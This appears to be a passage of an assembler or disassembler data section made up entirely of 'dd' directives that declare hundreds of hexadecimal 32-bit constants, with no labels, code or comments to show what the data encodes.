dd 20C6741Eh, 6E451099h, 0DE870326h, 16A3B13Fh, 0F4D8D393h
dd 0C4D90D05h, 0E4D336B5h, 49E3E07Bh, 38DCAB3Dh, 0D7114E13h
dd 0CB324C9h, 2861EC3Ch, 34610E51h, 0D8F60D86h, 7CFD3466h
dd 0F5C0EC62h, 0E1D69E9Dh, 62ED544Eh, 78BAED16h, 0BC3248Dh
dd 0EDC36C26h, 2E7BDF0Ch, 14126CB8h, 6404B027h, 0B27FD85Eh
dd 0FF38AE23h, 0DCBEF843h, 151AA504h, 0CE17C6C2h, 0D1EF5E30h
dd 14C4845Fh, 1AFFEF76h, 22E12D5Bh, 98D2D7Eh, 0B338783h
dd 67770E63h, 13B78BECh, 0B522A29Ch, 390B049Fh, 0F3C0D293h
dd 24115C28h, 910EFF6Fh, 0FD8BFB8Ch, 0FB13FF3Eh, 3D16DA6Dh
dd 13F6FE0Eh, 0BDF41FCh, 0BAFF8BF6h, 0DE31EF08h, 7E168603h
dd 7133FEFDh, 8CFADA9Ah, 17ED6B09h, 1F9FEFD9h, 158D55ECh
dd 9F1F326Ch, 0DABA6F24h, 9F4002B7h, 803CFD6Bh, 2AFD7FFBh
dd 0FBB52598h, 62454993h, 1611DE1Fh, 5EE3ED3h, 0E7C81612h
dd 0D67E7313h, 0DA8273A7h, 1608DDEEh, 9417BD81h, 8BFA5FBh
dd 6FFD9601h, 0B71B7046h
dd 0BB530BEEh, 4635294Fh, 533EA9BAh, 7EEF76EEh, 3B30FB6Dh
dd 9A08B009h, 6F060FACh, 5FFD6475h, 717FE75h, 9A58DF0Eh
dd 16A6FE6Fh, 0DFFE3B75h, 83FB84CFh, 79636AFDh, 3DA37F1Eh
dd 277FE0Dh, 0DD8DFB8Eh, 14314DFDh, 8DCF087Dh, 0B79FF81Dh
dd 630D5488h, 0E660A70Eh, 0C3DD4F6h, 0B7FBD59Eh, 0D829BE26h
dd 28C81A92h, 0F6170336h, 1230AA62h, 0BB3C6037h, 7FC125B4h
dd 0FE0A3DE7h, 81FB82FBh, 1B1A5DFDh, 0A1B7506h, 9F3DB0E3h
dd 20B70493h, 0CE0D34D8h, 675C13CFh, 4BB1E517h, 920EB30Dh
dd 4C2456EFh, 4F4E877Ch, 0B10E32B7h, 3DDDEEBEh, 0EFFB4E0Bh
dd 0FCC01505h, 0CF295824h, 8C23DD2h, 0FB3D6DFEh, 86BE8321h
dd 3AB5B2FBh, 82110DDDh, 3C08BBh, 498938B6h, 6F05B2A2h
dd 1B87486Ch, 0EB7B2624h, 7B04CCCFh, 0D9A8D15h, 840328AEh
dd 7A37FED5h, 0D9BB078Ch, 362BFD30h, 79CD4315h, 1DB8EF2Eh
dd 3E871E5Dh, 2349BD63h, 49808F7h, 984276DDh, 8DDF0375h
dd 669E5A35h, 23F7970Fh, 168AD8C6h, 369151D9h, 777DE9C7h
dd 0DAC11731h, 0EFCADFA2h, 7E979068h, 0E44671D6h, 0FF7C298Bh
dd 7EFB5115h, 0C918EF26h, 3C99B289h, 0D95DD16Ch, 3D28F759h
dd 18632709h, 751FC9A4h, 0ECFB8A5Bh, 2596FD89h, 7D2FB56Fh
dd 1AFE88ADh, 528FE5FBh, 0E2B61FDDh, 86221A8Dh, 4416D140h
dd 0F6FC53AFh, 9F153E2Bh, 29863DE1h, 0C4228CE9h, 87C23224h
dd 0FC508CFh, 15FB2BD6h, 4B422C36h, 35E6D11h, 7909ADDh
dd 89036EAAh, 861DC69Dh, 130E33C6h, 37FCEE9Eh, 561F0AFDh
dd 9A72FEFCh, 0FAC57AEFh, 6F17C1FEh, 85FB8603h, 0FE2DFDDCh
dd 0B0E40BDDh, 6343388Ch, 43F8FB6Ah, 83D677Eh, 0C97CE94Eh
dd 9227B2F6h, 0BD7C856Ch, 0B62154E4h, 0A7198037h, 5A16BEDEh
dd 0FE17F0E0h, 0BAFEBF11h, 3C5217EDh, 0C8570A01h, 16EDA979h
dd 0FF755C15h, 5B2D5B5Bh, 55464451h, 854357DBh, 0FB012548h
dd 7B15B5h, 0D7EF0F76h, 0D65B0374h, 2AF768BAh, 0C61F95A1h
dd 0C01DF8FCh, 9356458Dh, 0FA497073h, 55E9298Fh, 36118C62h
dd 233D4D1Ch, 0FEA40E84h, 0FE42B759h, 87FB881Dh, 13C636FDh
dd 7D2AFFCEh, 1D18F315h, 7F63FBCFh, 342BAEFh, 0A34CDECAh
dd 8DD65CFh, 0BB86EFE6h, 0D86603DDh, 0FD6614BDh, 621DD6B0h
dd 639F608h, 0F9363F38h, 27FD4CF1h, 3FD20A17h, 2B5B0B00h
dd 0B10327AEh, 0C93111Eh, 0C90758D8h, 0EFB5967Fh, 0A47A1B79h
dd 0E7CD597Ch, 0DDEE2930h, 3EB24D51h, 0B2CE0D8Ah, 5945C1B7h
dd 0B385C6B7h, 4F4C2D2Dh, 0C62A401Eh, 67B00914h, 130B6A56h
dd 0F3D3B319h, 0FDBA93D9h, 191537A3h, 49765FEh, 0EDD445F4h
dd 20B54BC9h, 3E9FCC06h, 0C10F0326h, 2B63B1BBh, 38EECA84h
dd 0C72C7AF4h, 1D6697CBh, 96BDE2C9h, 68A77813h, 306DEFEFh
dd 0CF0F6DFh, 0C356319h, 80DE3309h, 0A7343E2Ch, 0DF1D541Eh
dd 901E4FCDh, 1B0AB33Dh, 110B369Ch, 0AA5B456h, 3898FC0Ah
dd 2977351h, 65DB7E44h, 0E7B52094h, 45A606D1h, 3D03AB9Bh
dd 0EB1E565h, 0B68645DCh, 0DF8FBA28h, 0B1D3B028h, 1A1D845h
dd 0AFC0A298h, 0D1845730h, 0D671210h, 84118301h, 4A990D45h
dd 7B515815h, 0B307FD6h, 38DFFDBh, 185182BFh, 44F011D6h
dd 6FFC08D6h, 6DFFB142h, 0D97A65B1h, 0EE1AA365h, 800B5A4Fh
dd 0DBA9B999h, 8100F6C9h, 0FF379007h, 1A9DB3Dh, 65BB2A3Bh
dd 838911FFh, 6EA4F51Bh, 0D152FFCFh, 66B2B9ECh, 0CAFBAF8Eh
dd 103F3A7h, 8FD87F00h, 6CD8CB6Fh, 3682A4FFh, 0C6DEC19h
dd 15F9FFCDh, 12A85AD7h, 78FFB618h, 26048289h, 0FFC9B8DCh
dd 0F55023ABh, 0F316ABC6h, 417883FFh, 0DD869E15h, 674EFF19h
dd 16A523Ch, 92FFB5B6h, 92D012E5h, 0FF21110Dh, 20102E9h
dd 5261A70Bh, 0AD07C5FFh, 2E6B7AB9h, 0A36EFFCCh, 9342F4D6h
dd 42FF2915h, 6A01063Bh, 0F0373CD2h, 3C4FA8A9h, 2A65E66Fh
dd 0CD388D9Fh, 4EFF5616h, 0EB7A2CC0h, 0BEFF6D3Ch, 0A2EB52C6h
dd 0FFA7D4EEh, 2545914Dh, 0D804ECFDh, 0F0BFC7FEh, 0B71D236Eh
dd 705130DDh, 0FFF9CF4Bh, 159F6952h, 95127741h, 0D7CD45FFh
dd 1C305227h, 0D1FDFFBAh, 7908ECA9h, 17FF2C55h, 0D636FC19h
dd 0FD546B2Ah, 0DA45F9D7h, 0CC1BEE31h, 0CF7F6F01h, 0F2FFC221h
dd 0B70BBD01h, 0FA8CEED6h, 0ECC24405h, 56CE376Ch, 1FBDFB2Dh
dd 3F1686BBh, 8E3E9B7Fh, 0FF40FF0Dh, 0F85EAA3Ah, 43B2DD27h
dd 779CEEEDh, 0E2FFFBFh, 532EF9B2h, 192F5155h, 0C5FF47C4h
dd 0B9A95EAh, 6F01F6C3h, 0B916B37Eh, 0FFB07F6Eh, 6C7F8946h
dd 0FF61E2A0h, 7D069038h, 0A83D58ACh, 1CAA93FFh, 5FACC65Ch
dd 5F76EDEEh, 81FFFF42h, 8F6E64E2h, 0FFAABB50h, 335B7E9h
dd 0B61BDA1h, 77062FFFh, 0D4027804h, 53AAFF89h, 37EE66EFh
dd 2BFF2183h, 2B535441h, 0FF814ED5h, 9BA5A26Dh, 22047E9Fh
dd 0CE5FDCC8h, 0D23FC794h, 8F8EFF62h, 786DC758h, 0FF6341B7h
dd 658FF683h, 0FF800525h, 0F1BFBB97h, 0FFD52644h, 2A4604A1h
dd 0D51E2CE8h, 6B8339FEh, 9B782935h, 68BB3F17h, 0AC73A0FCh
dd 2E3C3F69h, 8D98107Fh, 3F71B7A9h, 0E4FF506Ch, 1E56564Dh
dd 0FFB8EC8Ah, 0F11F2302h, 0C3AEA853h, 8001F4C2h, 0E1FF7F86h
dd 3927057Bh, 0F67903A1h, 2A6C3CC9h, 2D3DFF7Fh, 15736559h
dd 0AA7CFF09h, 1B52AEEBh, 0FF6FD3A9h, 0FFF1D3B8h, 7A887F9Eh
dd 0D54E8286h, 0E3C62AFFh, 0A1FD8E95h, 3CC0FC38h, 0BA8BC61h
dd 90B2BC2Fh, 726FD45h, 0A5FDD692h, 0B8C5BFBEh, 69145355h
dd 0D5DFFF2Ah, 0A2221889h, 0EC5965FFh, 0C1D1EAABh, 501BEDABh
dd 76FF7FFAh, 0FA7A86D4h, 0B769E6C5h, 0D6B3F4Fh, 25CEDEFFh
dd 6E0520BAh, 0A9BFFF0Eh, 4793E40h, 97DB027Ah, 0F0DEFFF6h
dd 0B636EBE2h, 0E17E3FBFh, 6ED94ECFh, 471EADBFh, 80FF6ADDh
dd 5218A473h, 0FF7BDCADh, 9E7809ECh, 67A00099h, 2BBD3FE1h
dd 12517FBFh, 7591A8Eh, 7A7DBF7Eh, 7E253EEFh, 0D5F0240Eh
dd 8C030B1Ch, 0F7FF237Fh, 49428CA1h, 800919FFh, 5127A0AAh
dd 10C8FF75h, 291DB2Ch, 77E89B06h, 18DFA210h, 0E42D4D52h
dd 527455F8h, 7F5FB602h, 0CB387B5Ah, 0C0EA0FDAh, 988600DFh
dd 0F2FFF80Bh, 0B7AC0617h, 0FF52520Dh, 4D2A6B54h, 19C2E5DBh
dd 27792CFFh, 7EACEC1Ah, 0AB1A5B5Fh, 6F152BFFh, 8606F56Ah
dd 350ED879h, 0E17DFFFFh, 77058EB5h, 8C03FE25h, 9639E3F0h
dd 37D1747h, 0F625F810h, 0D40EA1A9h, 6D80DF3Fh, 0EB0E55D0h
dd 7F4EC8C6h, 657BF921h, 747FDFCDh, 3F8C20B7h, 8418FFC2h
dd 0FF3AD6C9h, 6BC457DDh, 1237A185h, 0D7D973FCh, 706752AFh
dd 66FFDFFEh, 0FF121836h, 7338EE9Dh, 5539DD9Ch, 0FFD57F6Fh
dd 39E2FF10h, 159D623Dh, 0DDE39405h, 703F064Bh, 3FADBDA4h
dd 223F0B29h, 0AA6840DBh, 6D15FFA1h, 4DCE663h, 0C1B73629h
dd 0FE75497Fh, 0B1BA05F6h, 1403E949h, 2E0A6FBFh, 0BA8C5967h
dd 0A2C7FBFh, 8EA1F98Ah, 860C42EDh, 1C99F8FFh, 0DFA85024h
dd 0D68693Fh, 0BF0AB725h, 9F231E50h, 0FF26BF0Fh, 0C0A27438h
dd 29E8AABFh, 0B3ADA40Ah, 0A8F3F3FFh, 0ABA1EED4h, 251AD2C2h
dd 0EA57FFDBh, 84C6472Bh, 6516FF17h, 2839EF3h, 0D0C7EAD7h
dd 9CFFBF11h, 9DF1019Ah, 0FA8622h, 0B6DD1DA1h, 0C618FF78h
dd 0BF7615BFh, 373CF332h, 3F23FB4Ah, 0BF463840h, 907F3F5Fh
dd 0FF3CB750h, 0DFED95FEh, 0C03F3D9Bh, 2DBF54E9h, 938E9F6Eh
dd 0B0B9C67Bh, 0D6D9FFB4h
dd 4EDDFB6h, 167AFE08h, 37190EEDh, 0FF3F1D05h, 0C0EC6DBFh
dd 958CE651h, 0FF36E1BFh, 4B5193FFh, 0FC0394A5h, 4362BBD3h
dd 0BF6ED7AEh, 717F47C9h, 8504A6B9h, 0B9EC3F20h, 677F10AFh
dd 387DF8DAh, 475A0231h, 0FF0EAF3Fh, 62453902h, 0C3D8B69Eh
dd 3E3FC6F8h, 7F467B0Dh, 0C3BFB005h, 0FF51423Fh, 187DBA3Fh
dd 42307CBh, 0F8EB9AFFh, 0F6D3A0EAh, 0BF01B1ADh, 6D02259Fh
dd 0F5C79BFFh, 5E3EC6A9h, 5293FE3Fh, 0E9C6EBF9h, 413F3707h
dd 0C52DF657h, 0FE3FD172h, 3557121h, 7F915583h, 7F23279Ch
dd 4730F565h, 0FFB8B259h, 6617C8D9h, 0FF4B4ECBh, 0BF1F85F3h
dd 917C81FFh, 0A84F3CDCh, 0EB0D522Eh, 427FA5FFh, 0FF7FADC6h
dd 0C60FA16Bh, 9154D32Ah, 0FC093F5Bh, 53A4EE85h, 3F08C7CBh
dd 4F918EFFh, 0A3D9D0CBh, 7FFF12D2h, 3F7137FEh, 370EC36Dh
dd 1B3292FFh, 26FC687Fh, 3D4CAC71h, 0E061BCCEh, 0A4BF67E9h
dd 4AA5E2FFh, 55E62D4Fh, 2BF6341h, 3F17BF1Eh, 1B97D8B1h
dd 0C1F43996h, 0BF350489h, 98E0693Fh, 0C0FF268Fh, 0BE4E50h
dd 0FF9B8643h, 0DBA902EEh, 0EC37683Ch, 0C33873FBh, 7F3F01AAh
dd 0C259D079h, 96E0E07Dh, 7F476B1Bh, 5C0909Bh, 0CB8B712h
dd 90E97FFEh, 95A32F46h, 4EA1B7E3h, 3B84022Fh, 0C259673Fh
dd 0AD7F9C5Fh, 0B3C9FD7Bh, 3E3AACCCh, 0F8C206BDh, 4F7F639Bh
dd 1023DD3Ah, 95BF3FA6h, 0ED8D0B99h, 3A83ADFDh, 0BCA886EEh
dd 7F09ADBFh, 3CBC33E3h, 85E4767Fh, 356DFEFFh, 41079F36h
dd 1A643F1Fh, 0DCAF52FFh, 1A097F1Ah, 0FD44F178h, 7FBF819Fh
dd 7598FAA8h, 0FC3F1866h, 2FEB633Ah, 407E6FFEh, 0DFFED76h
dd 0A4D9780Fh, 0BE63007h, 0C2AC60FFh, 4B0767FFh, 0DCD61EDBh
dd 4A32FF87h, 7FFD7D4Dh, 2E015A12h, 17EC903Fh, 91A8ADFFh
dd 3F5AA490h, 0CA8251FFh, 0E06B4A12h, 71A9D994h, 7BBFF67Fh
dd 0C81CE37Fh, 93121F7Fh, 45FC9BFFh, 4F00A193h, 46BF3832h
dd 2C4F243Fh, 0EBD59721h, 7FE28DA9h, 0C6BC8CCEh, 7F049C7Fh
dd 1F7FBC3Bh, 2A4538AFh, 44F597F1h, 0FB9BC94h, 7F6F2AC8h
dd 0C2C27160h, 33FF35A6h, 0F3C2FE29h, 0EECB680Bh, 0BAFF7F11h
dd 2E8FB8DEh, 0E9814496h, 0BF41095Fh, 0DE9498BFh, 63C55FF9h
dd 0FF18437Fh, 6E4EA0F0h, 795CBF6Ah, 7F2F6B39h, 0E12E1F35h
dd 0FFABF852h, 0A41E7819h, 8B0DA98Bh, 0FF5160C2h, 0C6B308E5h
dd 32FF9019h, 0F6080C2Fh, 86FBBA38h, 7FD552C7h, 3A28CBB0h
dd 0BCFF5DBFh, 873F8CD6h, 7F1A7F4Eh, 28B051E5h, 6B7FD5F6h
dd 8FBE7F8Ch, 0E366E552h, 0FFDC24CFh, 44D067Fh, 0FFA239A5h
dd 2B4651F1h, 79533FCCh, 0D33FA385h, 7F7FC1D0h, 740474EFh
dd 8DEA9A02h, 0EEFCBF0Ch, 0DA7992BAh, 2DBF0AFDh, 0D815F8A1h
dd 0DFEFBA82h, 0F1BB443Fh, 0F4B8F703h, 71FF9A25h, 8CA9CCFDh
dd 9CFB03FFh, 0F062846Eh, 0F1FCFF5Eh, 743FDC54h, 60FF342Bh
dd 971A7F1Bh, 83C11F9Ch, 6BAD3F4Bh, 0F5F7C1BFh, 70BF7FE3h
dd 0FF2E9CD0h, 3F115CA8h, 99BF9384h, 0FFFFD8B7h, 0F8323069h
dd 6F057DA3h, 57F187Eh, 4BA88AFCh, 2F03A2D6h, 0B5F7073Fh
dd 0B36F78FFh, 9E81FE65h, 0EF2CC015h, 0B8B0BFFFh, 0B1A92552h
dd 0DA9CBF95h, 1234BF1Dh, 8388337Fh, 9F55763Fh, 69E9F07Ch
dd 0F47F2102h, 0A3516BE9h, 927B71BFh, 6BF9AA5h, 0D1FFDE18h
dd 0BF0D8BD2h, 0BF0DC90Ah, 0C49540F8h, 3FBE745Fh, 95AB5C4Ah
dd 0E1A4781Bh, 3F6AD565h, 0A8FB1F19h, 5B7F0538h, 3F6B5351h
dd 0A3927FFFh, 0AE440047h, 0DFB804C1h, 0AB3A2EBFh, 0A0A491D4h
dd 0FF1B673Fh, 1239D739h, 767E543Fh, 0DBFF428Dh, 0D87FFDB0h
dd 0F81822A5h, 7E057301h, 0A3B437A8h, 7778FF14h, 57C96AF5h
dd 10832BE4h, 0B144BFBFh, 0B0070C7Ah, 0A6A9BF02h, 4F9B697Bh
dd 18787F7Fh, 0C3605B31h, 703FFF73h, 7FB98BF7h, 0D6F8C923h
dd 3F97A7D5h, 411B8E99h, 337F0206h, 0F73EA55Dh, 4FBD4A38h
dd 4C57DFFh, 63052AFFh, 0DCF0523Fh, 6FADFFA0h, 6E5A88FFh
dd 22CE3F48h, 0AC44FF17h, 0A7A7F07h, 1101F3CCh, 63ABFF3Fh
dd 20FFC532h, 1AA410B8h, 0FE6360BFh, 68C383Fh, 0BF5B7F1Ch
dd 0BF6C89F0h, 0BD913DB1h, 8AFE4D7Fh, 3CBF3FCBh, 0BF63DEFCh
dd 0FDF2238Ch, 0C4D7920Bh, 3FB96736h, 3218C65Ah, 9DFF3F11h
dd 0DE2721D3h, 185950BBh, 3FDDD3BFh, 0F8A47FB1h, 3CBA99BFh
dd 3F6321CEh, 9990FFA5h, 545505DAh, 0EBB1C2B7h, 0DF300BBFh
dd 0BFFD2AD8h, 0CFF4ED6h, 0BBF5BCF2h, 637F3711h, 0BF4D5B12h
dd 7F6E8E43h, 3EED44DDh, 0A405F0ECh, 0FF8F61F6h, 0E095F916h
dd 5C9E6778h, 3E2182B6h, 0BEF8C7BFh, 0FF37AC3Fh, 94FE2415h
dd 88238C04h, 3F171629h, 0F302EA4Eh, 0BF4D78E9h, 0C3FFB819h
dd 47D01F7h, 1E0C897Fh, 420F17Fh, 12029E05h, 0DF54FFFFh
dd 857239B7h, 2A27FD29h, 598BEh, 0C11E7F2Fh, 0FABF630Ch
dd 0BFC67F4Eh, 4B3F133Dh, 0E3D1623Fh, 0AB7FD1D4h, 0BB038077h
dd 71D7A125h, 3FC79662h, 6EE9FA7Dh, 1A3F4AF9h, 173F3129h
dd 18FF2F3Fh, 9E92C0FFh, 0C6A6A1FFh, 3F0C917Fh, 0FFD2AD99h
dd 7F818D33h, 79938F73h, 61A98927h, 91A54F7Fh, 0B1DA3982h
dd 0A39F3FA8h, 0BF166C12h, 439A6AFEh, 0B7A52799h, 0B7FAC0BFh
dd 27EBDF1h, 7EFFEA84h, 25FAC473h, 897F1166h, 9E1FFFB5h
dd 0C2ABE510h, 0FD3F3DC3h, 1FCB99A8h, 8EC85BCDh, 9FFF77B1h
dd 0E104E468h, 0FF603631h, 1ABF43A3h, 5AFF4C29h, 0A9FFC67Ah
dd 0E17897Fh, 886F697h, 3F3FF00Ah, 0CD3FC956h, 9E80FF05h
dd 0A1DA42F2h, 7F430211h, 68C93D7Fh, 620B500h, 926E80E2h
dd 11024FD8h, 34D6FF3Fh, 0C4A51238h, 0BF06B62Bh, 0FFBF2F4h
dd 8A46BF2Fh, 0BA18F016h, 3F63EA78h, 55C62410h, 7EBF63FFh
dd 2E154CAh, 0F8FF0783h, 386AA4Eh, 2200EAA4h, 0EF92BF17h
dd 6B7F7581h, 0BF58C836h, 783F7FC6h, 0FF465503h, 2CBF3F3Bh
dd 33FF52C6h, 54D0FD2Fh, 92C02E7h, 0CA1AE9FFh, 0C8B779BFh
dd 4F8F7008h, 0E3593F8Ch, 2607193Fh, 793FFD31h, 255E2C09h
dd 27FBBF23h, 89A0E30Eh, 0B60BFEFh, 705D55h, 0F4743F37h
dd 77CF3F18h, 4ED6DB12h, 0CEFE243Fh, 0E90ABFDBh, 2A5FDBAAh
dd 8160B335h, 7FD63FDFh, 0BF63C730h, 903BFD6Dh, 1EA06714h
dd 0E8DA7FD1h, 723FFABFh, 0B186FF9Ah, 627CF43Fh, 0BC45A5B2h
dd 7B9CF298h, 0D65D7F4Fh, 0FFBFA990h, 4A9041DBh, 0A90273BFh
dd 0D8B53F0Ah, 897F8F96h, 0C5D167C2h, 0B1FF8CF2h, 5FD58FF8h
dd 436803BFh, 558EF865h, 5F2A6215h, 0FD9388FFh, 0FE3F5642h
dd 1F380D06h, 3FCF4B60h, 0BFC46A8Eh, 3FFFE17Bh, 36DAB8F5h
dd 1A08447Fh, 0C0460CBFh, 2DF8FF04h, 7F5E7562h, 0C615E609h
dd 0C27E8FBFh, 47D4DB9Fh, 951466Fh, 0E5BF6EFBh, 0F4FF2D3Bh
dd 4442D824h, 4A63BFDFh, 0DBE40455h, 0A13FB11Eh, 0FE87C791h
dd 97AFFCFFh, 1A6F603h, 8539BF0Bh, 5DFDBF26h, 179A2B9Fh
dd 757FBF34h, 0E43D50ACh, 0AB3D7F56h, 0FF0D26CEh, 0B4FF1666h
dd 0B37F631Ah, 6BDE45A3h, 58187F9Dh, 0C6FE4068h, 7FB1F77Fh
dd 0DA857F0h, 7ABF2328h, 0A579D0E1h, 0C7C11A7Fh, 0B033087Fh
dd 0BFD6BFD2h, 77DA83FCh, 7F23032Ch, 1C33FFEh, 0AF24EAA7h
dd 0A47F4E98h, 1594427Fh, 9B6BC002h, 0F0727FD2h, 236CB865h
dd 6F0DDBFh, 0BA9A3985h, 1D4AA23Fh, 0A3F63BFh, 824C3F46h
dd 3EF3BF49h, 0BF37D575h, 0BF1B5F2Ch, 83F2E2BCh, 0DB7FDF07h
dd 0D7ECDEC2h, 51BF4BCCh
dd 447FB52Eh, 818F23BFh, 0B7718B5Dh, 867B7F8Dh, 0C22877C9h
dd 0A313FF97h, 0CDD8A83Fh, 7FE782C2h, 3F36C33Fh, 0CE235360h
dd 0BFDCBF0Eh, 0FF0315CAh, 0F1C442CDh, 9795EE94h, 1604BF6Fh
dd 0BFFEAC46h, 0DAF89E67h, 746CC554h, 70547FC6h, 0D1107F1Bh
dd 3F8CA89Eh, 3F46EAF6h, 44FE7FB7h, 0F7B62B88h, 1422F67Fh
dd 0CF416E20h, 0D5FFAD2Bh, 0BF8CD0D6h, 0BC583D7h, 46D41A3Fh
dd 6CBFD6A3h, 8FCC307Fh, 3FDB18FFh, 19BFCEABh, 0F111FE1Ch
dd 266CA845h, 0C7A3803Fh, 0F8E7B0BFh, 6B74B9A7h, 997F07EAh
dd 6EBF2E9Ah, 0EBBF8D35h, 7FF9E183h, 903FD8C0h, 0C1BFDFFFh
dd 0F0A1D84Eh, 6A421577h, 0FDC3F8Ch, 0C013737Fh, 0F07F8852h
dd 1C54DC9Bh, 0CFD6803Fh, 0FCFF85E3h, 0BF188976h, 7F35B135h
dd 0B7BF61F5h, 0E0DD03Fh, 9FFC7BFh, 0DA65E0F7h, 74FF4639h
dd 5499BF8Ch, 0C46D73FEh, 3F1E8255h, 7B074615h, 3F7F0EB4h
dd 82D6AA5Ah, 42F4EC9Eh, 0AA6AFF5Bh, 0BF74FFF5h, 0D33F63ABh
dd 1EBF5C3Ah, 1D6E1B8Bh, 0DB7F1E8Eh, 1B7F8B21h, 3F7FA182h
dd 0FFED903Ah, 707F3883h, 0BFD16F75h, 0A07F2D3Eh, 7FDD5C28h
dd 0FF4BF6A9h, 19A5F81Dh, 2535A9C2h, 92CAFF7Fh, 0AE0AC0Eh
dd 79FA0477h, 0EFBC6A0Ch, 0D4353F5Fh, 75FFCE8Eh, 0DDB5CF58h
dd 0BAD4AD3h, 7F6F798Dh, 0D11FACECh, 0FFBCF85Eh, 6F8DA586h
dd 628D15FFh, 0E04144F6h, 0F530BFE5h, 7BDBBF49h, 76C2163Fh
dd 11E57F8Dh, 0C1BBFB1Ah, 0BFB62CC4h, 897FE5EDh, 0BF50E85Fh
dd 7F9EEF7Fh, 3F07E402h, 3F75D740h, 68FFBE58h, 9B080297h
dd 0FF41A4BFh, 0D02AE0D1h, 46CAF82h, 0BF70B0E6h, 3F37FF4Eh
dd 3F029C60h, 0BFEC034Ch, 0FF916060h, 0BFC6BF68h, 17F2F1Fh
dd 0FAFEBFF3h, 1D18E06h, 0F99C3F91h, 4DACBF34h, 12E9CD7Fh
dd 1FBF6B45h, 0BFBBD019h, 3FB65B68h, 68FF2CECh, 323FF4F0h
dd 427FB3BFh, 7E7F8941h, 0F02C71C5h, 6E3F2FFAh, 31AA477Fh
dd 12229C7Fh, 2D56FCFFh, 6EE5E3ABh, 47D39AFFh, 0CE1DC20h
dd 7F3F53CCh, 9E842176h, 0C68442F6h, 0C247677Fh, 0FEFF369Eh
dd 4F36A2EEh, 0FF24FD26h, 0CEF07364h, 527F238Ah, 697CFF56h
dd 0FF086A58h, 3FE00FC1h, 1044BFBFh, 26F992E8h, 0DFE5BFEAh
dd 53D8C7Fh, 9714C679h, 1010E2BFh, 3F36FE54h, 0FFBABB14h
dd 1EFF0BEFh, 0C60E9D6Eh, 0BF1F1BFFh, 1DEBABC3h, 0FA3FBF50h
dd 37416E5Ch, 125290BFh, 9D44E0BFh, 3E873F5Eh, 883F3146h
dd 8C7F6120h, 7F07053Fh, 0D0BEBF23h, 56D6A76Eh, 94ECC9ADh
dd 67BF4742h, 0C36FC4B0h, 0DE8BFBCh, 0C4BF18DBh, 0B4BF93CEh
dd 0FF893F13h, 6FF7C2F1h, 4BFDD67Fh, 1AC07F57h, 36687F76h
dd 7F4B6C34h, 4A2AF6A0h, 33BFA525h, 53FFA7DDh, 7E3FA43Fh
dd 59FA90E7h, 21FFB7FFh, 3F123FCh, 60FFA43Fh, 81FF49ACh
dd 7FC23F38h, 0BF31E9E1h, 7C75B769h, 85692D3h, 7F977F4Ah
dd 0CEA017Dh, 0FFCE2096h, 0FF727000h, 0A8A27C5Eh, 0CCFFDFA6h
dd 0E00619F7h, 1F50B7AEh, 0EADD96FFh, 4611C2C5h, 0A4C877Fh
dd 7DFC177Fh, 3F44A79Ch, 0A5D8C8FAh, 0A35CF76Ch, 0FF2FD6CEh
dd 1BA8EF5Fh, 91C4827Fh, 53F3CE6h, 91A5678Eh, 2B14FFBFh
dd 0FF7B6579h, 3F020191h, 0FF62F031h, 0A7DF088Dh, 0F053BF62h
dd 2455EA2Dh, 3B9BF4Dh, 8E7F86BFh, 0FBBBBF83h, 0F5C4CEFFh
dd 5BC2B625h, 9D86FF36h, 0A5113FBAh, 0A1BAC63Fh, 6575F2FFh
dd 2313F083h, 0B2FF0F63h, 0AD19FF33h, 23B2F11Fh, 6C3F0BB1h
dd 0B8101BFAh, 3F47A94Bh, 0AEEA90A8h, 0BFC65075h, 4847F56h
dd 0DA8CDC28h, 654677Fh, 0C038E33Fh, 229C70FFh, 8CA1FFD5h
dd 7F09D53Fh, 0C4E22233h, 6D3F5F2Ah, 0F8CF55C8h, 82C1D89Ch
dd 6FBFBAA1h, 7D7FFF24h, 40730C35h, 7CACF155h, 3F232107h
dd 7FFF0038h, 3832015Eh, 85A2FC80h, 0F964AABFh, 0FE2FE46h
dd 0BC1FD82Ah, 49F37F46h, 0AC7FCD9Fh, 0ED3D5AEBh, 132218FFh
dd 0A3C1C17Fh, 63F13FBAh, 31387FBAh, 34BBF9BFh, 1905266Fh
dd 0ABF6FFBEh, 0CB54E001h, 478E6CFEh, 189FF451h, 0DAAAFFDCh
dd 0D6CFBF48h, 8104F123h, 3F8FFD9Ch, 0FFCFB7BFh, 0F52B5578h
dd 1E06B1B6h, 7F6BEFC2h, 80F85BEEh, 5F3310FFh, 0EE64EFA1h
dd 0FCBF48A9h, 7219B980h, 31FF5E7Dh, 3FA8A47Fh, 8C3804F1h
dd 0BF538DFFh, 6FFC108h, 3E5E323Fh, 4E63170Eh, 0A5B1BFB7h
dd 78BFF1A3h, 11F3362Ch, 7F04A9FFh, 0EE3FBCD1h, 7F0286F6h
dd 0F6BFDCC6h, 0BFD771DCh, 0CF56E0E0h, 5B3439FFh, 3BABADFFh
dd 7DC5EDFFh, 0C081E0FDh, 8DD49DCCh, 0BF5ECCFFh, 0A1BCFF09h
dd 0B1BE8B6h, 0B2FCF9BFh, 0A9C83F53h, 0C93F18F7h, 4E4931C7h
dd 0FAFFA63Fh, 0C1ED764h, 7C7FFFCFh, 82D5220Eh, 6DFFFF91h
dd 563F550Fh, 11CEF07Fh, 327F2383h, 4CBF9738h, 3F7F4290h
dd 0C279CE0Ah, 95DBFD85h, 3057567Dh, 8377A75Bh, 0CD3AFF2Bh
dd 26053EBAh, 0F1BFF87Fh, 0DDD9AA42h, 35A6202h, 8C9D513Fh
dd 1FE25CBFh, 0E26A1AFFh, 3B0225EDh, 0EF8414BFh, 0FFF7D6C5h
dd 447FD010h, 5A04BF0Fh, 7AFF03A6h, 11D36427h, 0BF9BA37Fh
dd 8CF27E3Dh, 0FFFB947Fh, 8B1FBFFAh, 0AF65DB28h, 0EBC2BF19h
dd 6DE8A35Bh, 0A330177Ch, 3FA3A94Ch, 0F5C2C8BDh, 4F3FBC01h
dd 7F0229E8h, 3F0E661Dh, 6F357F01h, 24A83FB2h, 0DCB952FEh
dd 9BFBC2A8h, 9981BF2Eh, 0E05B1F3Fh, 0B2A525AEh, 2978E13Fh
dd 0E27ABFACh, 3F476078h, 0E5FD7D55h, 0C3127h, 96BF633Ah
dd 5860FF46h, 0BF26CAE3h, 0BB5226FFh, 9737CDCh, 0F778C10Eh
dd 827A3F23h, 0B07FC7D6h, 61BF131Bh, 7AFFF2C3h, 61D35E03h
dd 0D57F1B3Fh, 0FFBF9C85h, 0C05E94EEh, 9D854551h, 1ACEBF48h
